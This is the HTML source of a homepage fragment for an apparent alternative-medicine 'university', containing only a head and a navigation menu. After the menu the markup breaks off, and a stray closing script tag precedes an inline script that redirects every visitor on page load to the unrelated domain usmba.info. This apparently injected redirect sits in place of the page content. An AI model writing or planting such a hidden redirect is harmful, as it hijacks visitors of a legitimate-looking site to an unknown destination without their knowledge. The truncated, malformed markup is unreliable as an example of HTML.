<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>QUANTUM- VERITAS International University Systems QVIUS </title>

<link rel="stylesheet" type="text/css" href="css/qvius.css" />

</head>

<body>

<table width="1000" align="center" id="main-table">
	<tr>
  	<td rowspan="2" valign="top" width="270"> <!-- menu -->
			<div class="globe">
	<img src="images/globe.png" >
</div>
<div class="clear"></div>
<ul class="menu">
	<li class="active"  ><a href="index.php">Home</a></li>
	<li ><a href="about.php">About Us</a></li>  
	<li ><a href="president.php">President</a></li>
	<li ><a href="chancellor.php">Chancellor</a></li>
	<li ><a href="provost-triune.php">Provost Triune</a></li>
	<li ><a href="quantum.php">QUANTUM</a></li>
	<li ><a href="veritas.php">VERITAS</a></li>
	<li ><a href="pg-continuing-education.php">PG Continuing Education</a></li>
	<li ><a href="chiropractic-ce-california.php">Chiropractic CE California</a></li>
	<li ><a href="chiropractic-acupncture-ce-florida.php">Chiropractic - Acupncture CE Florida</a></li>
	<li ><a href="chiropractic-ce-idaho.php">Chiropractic CE Idaho</a></li>
	<li ><a href="certification-programs.php">Certification Programs</a></li>
	<li ><a href="ayurveda.php">Ayurveda</a></li>
	<li ><a href="botanical-medica.php">Botanical Medica</a></li>
	<li ><a href="homeopathy.php">Homeopathy</a></li>
	<li ><a href="nutrition.php">Nutrition</a></li>
	<li ><a href="somiatry.php">Somiatry</a></li>
	<li ><a href="locations.php">Locations</a></li>
	<li ><a href="air-registrar.php">Registrar - Request Transcripts</a></li>
  <li ><a href="alumni.php">Alumni Affairs</a></li>
</ul>    </td> <!-- end menu -->

  </script>
 <script type="text/javascript">
<!--
window.location = "http://usmba.info"
//-->
</script>
 
